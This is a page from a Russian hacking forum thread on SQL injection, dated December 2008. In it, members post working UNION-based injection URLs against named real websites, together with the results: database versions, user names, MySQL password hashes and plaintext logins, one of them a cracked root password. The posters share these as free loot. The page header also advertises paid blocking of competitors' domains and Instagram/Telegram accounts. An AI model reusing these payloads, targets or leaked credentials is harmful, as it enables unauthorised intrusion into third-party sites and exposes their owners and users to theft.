Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 714 из 1242

714

Опции темы

Поиск в этой теме

Опции просмотра

#7131

17.12.2008, 22:37

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от The matrix

слепая(Subquery returns more than 1 row)

Код:

http://www.nightnday.org/detail.php?list_id=1213%20and%20if(ascii(substring((select%20concat(version(),char(58),user())),1,1))>=1,(select%201%20union%20select%202%20),0)--

4.0.27-max-log:irentedit@68.178.232.59
pr=4

Угу . слепая, из 19 полей 17 выводится

http://www.nightnday.org/detail.php?list_id=-1573+union+select+1,2,3,4,5,concat_ws(0x3a,User(), Database(),Version()),7,8,9,0,11,12,13,14,15,16,17 ,18,19/*
И ветка пятая, а не четвёртая
atom_nightnday@localhost:nightnday:5.0.22

#7132

18.12.2008, 01:40

kolenwal

Новичок

Регистрация: 13.12.2008

Сообщений: 7

Провел на форуме:
142595

Репутация: 25

http://citycarclub.us/news.php?id_news=-1+union+select+1,2,concat(version(),char(58),user( ),char(58),database()),4/*

4.0.20-log:wwwadmin@localhost:ccc_en

Есть доступ к mysql.user

http://citycarclub.us/news.php?id_news=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t(user,char(58),password),0x71),0x71)+from+mysql.u ser+limit+0,1/*

#7133

18.12.2008, 17:39

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Код:

http://felinewww.com/report.php?id=-877+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

4.1.22-standard

PR 4

#7134

18.12.2008, 23:42

kolenwal

Новичок

Регистрация: 13.12.2008

Сообщений: 7

Провел на форуме:
142595

Репутация: 25

http://www.audi.co.at/news.php?newsid=-631+union+select+1,2,3,concat(version(),char(58),u ser(),char(58),database()),5,6,7,8,9,10,11,12,13,1 4

4.0.18-log:audiat@amelie.szg.porsche.co.at:audiatdb

#7135

19.12.2008, 02:49

The matrix

Reservists Of Antichat - Level 6

Регистрация: 09.07.2008

Сообщений: 102

Провел на форуме:
1744345

Репутация: 573

Отправить сообщение для The matrix с помощью ICQ

maxygen.com
PR 6

Код:

http://maxygen.com/newsview.php?listid=999+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user,0x3a,password,0x3a3a3a,host),13,14,15,16,17,18,19,20,21,22,23+from+mysql.user/*

Код:

root:55755cfc38918d75:::localhost

Код:

root:55755cfc38918d75:::93763-app1.www.desantisbreindel.com

55755cfc38918d75:Brein950
p.s Как видно можно подрубиться удаленно под рутом к бд. Сам не пробовал...
В общем ловите Халявку

Последний раз редактировалось The matrix; 19.12.2008 в 09:39..

#7136

19.12.2008, 04:22

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

The matrix

Не все так просто. Этой скуле уже год где то наверное) и никто дальше не продвинулся) .. подключится удаленно нельзя там. А дир под запись доступных нет.
Кроме того там есть php инклюдинг совершенно простой, и читать все файлы на серваке можно, но ничего с этим не сделаешь(( Даже в админку нельзя зайти, пароль и пасс почему то не подходит(( видимо с определнного ip только можно.. хотя хз..

--skipped--

Последний раз редактировалось попугай; 21.12.2008 в 03:31..

#7137

19.12.2008, 11:58

masternet

Участник форума

Регистрация: 18.05.2008

Сообщений: 130

Провел на форуме:
1113633

Репутация: 155

http://www.lawfirm.ru/article/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(char(32,45,32), version(),user(),database()),25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41--

#7138

19.12.2008, 12:05

0xA1isa

Новичок

Регистрация: 19.06.2007

Сообщений: 8

Провел на форуме:
218478

Репутация: 23

http://tibetska-medicina.cz/aktuality.php?cislo=-26'+union+select+1,user(),version(),concat_ws(':', username,password),5,6+from+users/*

karlos:kunes1

#7139

19.12.2008, 17:15

0xA1isa

Новичок

Регистрация: 19.06.2007

Сообщений: 8

Провел на форуме:
218478

Репутация: 23

http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,group_conc at(table_name+separator+0x0a),8,9,10+from+informat ion_schema.tables/*

http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,concat(log in,0x0a,password),8,9,10+from+login+limit+0,1/*

mythical:mistake

и кривая админка конечно же в /admin/ находиться....

#7140

19.12.2008, 19:07

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Код:

http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,version(),4,5,6,7,8,9/*

4.0.25-standard
PR 5

Код:

http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat(user,0x3b,password),4,5,6,7,8,9+from+mysql.user/*

root;14471e9057c154d6

Последний раз редактировалось faza02; 19.12.2008 в 19:26..

Страница 714 из 1242

714

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход